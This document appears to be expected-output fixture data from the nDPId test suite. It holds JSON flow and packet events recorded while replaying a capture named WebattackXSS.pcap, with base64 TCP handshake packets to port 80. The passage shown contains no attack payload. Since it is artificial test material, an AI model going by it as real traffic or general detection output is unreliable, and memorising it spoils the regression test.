+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1499347852742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347852742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87IFAAD4G2U6sEAABwKgKMoJiAFDnuKS\/AAAAAKACchAGXwAAAgQFtAQCCAoBPEg+AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7366,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":2,"flow_last_seen":1499347852742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347852742,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgmLb7idG57ikwKAScSDmbwAAAgQFtAQCCAoD5hmzATxIPgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":3,"flow_last_seen":1499347852743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347852743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07IJAAD4G2VWsEAABwKgKMoJiAFDnuKTA2+4nR4AQAOWFdwAAAQEICgE8SD4D5hmz"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347720094,"flow_last_seen":1499347725815,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347720094,"flow_last_seen":1499347725815,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347721376,"flow_last_seen":1499347726816,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60234,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347721376,"flow_last_seen":1499347726816,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60234,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347724082,"flow_last_seen":1499347729818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60260,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347724082,"flow_last_seen":1499347729818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347725355,"flow_last_seen":1499347730818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60274,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347725355,"flow_last_seen":1499347730818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347726623,"flow_last_seen":1499347731818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60288,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347726623,"flow_last_seen":1499347731818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60288,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7383,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347855324,"flow_last_seen":1499347855324,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347855324,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33404,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7383,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1499347855324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347855324,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82qpAAD4G6yWsEAABwKgKMoJ8AFBnHpBuAAAAAKACchCYqgAAAgQFtAQCCAoBPErEAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7384,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":2,"flow_last_seen":1499347855324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347855324,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgnxQBHT\/Zx6Qb6AScSC0ZwAAAgQFtAQCCAoD5hw4ATxKxAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":3,"flow_last_seen":1499347855325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347855325,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02qtAAD4G6yysEAABwKgKMoJ8AFBnHpBvUAR1AIAQAOVTbwAAAQEICgE8SsQD5hw4"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7395,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347856593,"flow_last_seen":1499347856593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347856593,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33418,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7395,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":1,"flow_last_seen":1499347856593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347856593,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8fnJAAD4GR16sEAABwKgKMoKKAFBRAjJzAAAAAKACchALdwAAAgQFtAQCCAoBPEwBAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":2,"flow_last_seen":1499347856593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347856593,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgooY0Yx1UQIydKAScSBFtAAAAgQFtAQCCAoD5h11ATxMAQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7397,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":3,"flow_last_seen":1499347856593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347856593,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0fnNAAD4GR2WsEAABwKgKMoKKAFBRAjJ0GNGMdoAQAOXkuwAAAQEICgE8TAED5h11"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7416,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347859192,"flow_last_seen":1499347859192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347859192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7416,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":1,"flow_last_seen":1499347859192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347859192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PBpAAD4GibasEAABwKgKMoKkAFB0dnKRAAAAAKACchClQAAAAgQFtAQCCAoBPE6LAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7417,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":2,"flow_last_seen":1499347859192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347859192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgqTwonDidHZykqAScSAgtQAAAgQFtAQCCAoD5h\/\/ATxOiwEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7418,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":3,"flow_last_seen":1499347859192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347859192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PBtAAD4Gib2sEAABwKgKMoKkAFB0dnKS8KJw44AQAOW\/vAAAAQEICgE8TosD5h\/\/"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347860489,"flow_last_seen":1499347860489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347860489,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33458,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":1,"flow_last_seen":1499347860489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347860489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA842JAAD4G4m2sEAABwKgKMoKyAFDBtqytAAAAAKACchAckgAAAgQFtAQCCAoBPE\/PAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":2,"flow_last_seen":1499347860489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347860489,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgrJy9x5\/wbasrqAScSBm0QAAAgQFtAQCCAoD5iFDATxPzwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7427,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":3,"flow_last_seen":1499347860490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347860490,"pkt":"ABm5CmnxAMGxFOsxCABFAAA042NAAD4G4nSsEAABwKgKMoKyAFDBtqyucvcegIAQAOUF2QAAAQEICgE8T88D5iFD"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7437,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347861783,"flow_last_seen":1499347861783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347861783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33472,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7437,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":1,"flow_last_seen":1499347861783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347861783,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lM1AAD4GMQOsEAABwKgKMoLAAFBG1cXfAAAAAKACchB88AAAAgQFtAQCCAoBPFESAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7438,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":2,"flow_last_seen":1499347861783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347861783,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgsCSqnQ8RtXF4KAScSBQewAAAgQFtAQCCAoD5iKHATxREgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7440,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":3,"flow_last_seen":1499347861784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347861784,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lM5AAD4GMQqsEAABwKgKMoLAAFBG1cXgkqp0PYAQAOXvgQAAAQEICgE8URMD5iKH"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7449,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347863072,"flow_last_seen":1499347863072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347863072,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7449,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":1,"flow_last_seen":1499347863072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347863072,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NydAAD4GjqmsEAABwKgKMoLOAFBzZGVyAAAAAKACchCvfQAAAgQFtAQCCAoBPFJVAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7450,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":2,"flow_last_seen":1499347863073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347863073,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgs7A+ay+c2Rlc6AScSAa9QAAAgQFtAQCCAoD5iPJATxSVQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":3,"flow_last_seen":1499347863073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347863073,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NyhAAD4GjrCsEAABwKgKMoLOAFBzZGVzwPmsv4AQAOW5\/AAAAQEICgE8UlUD5iPJ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7458,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347864367,"flow_last_seen":1499347864367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864367,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7458,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1499347864367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347864367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SwNAAD4Ges2sEAABwKgKMoLcAFBKORibAAAAAKACchAkLwAAAgQFtAQCCAoBPFOYAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7459,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":2,"flow_last_seen":1499347864367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347864367,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgtztJOKwSjkYnKAScSAsRQAAAgQFtAQCCAoD5iUNATxTmAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7461,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":3,"flow_last_seen":1499347864368,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347864368,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SwRAAD4GetSsEAABwKgKMoLcAFBKORic7STisYAQAOXLSwAAAQEICgE8U5kD5iUN"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347729211,"flow_last_seen":1499347734819,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347729211,"flow_last_seen":1499347734819,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347730501,"flow_last_seen":1499347735819,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60328,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347730501,"flow_last_seen":1499347735819,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347731797,"flow_last_seen":1499347736820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60342,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 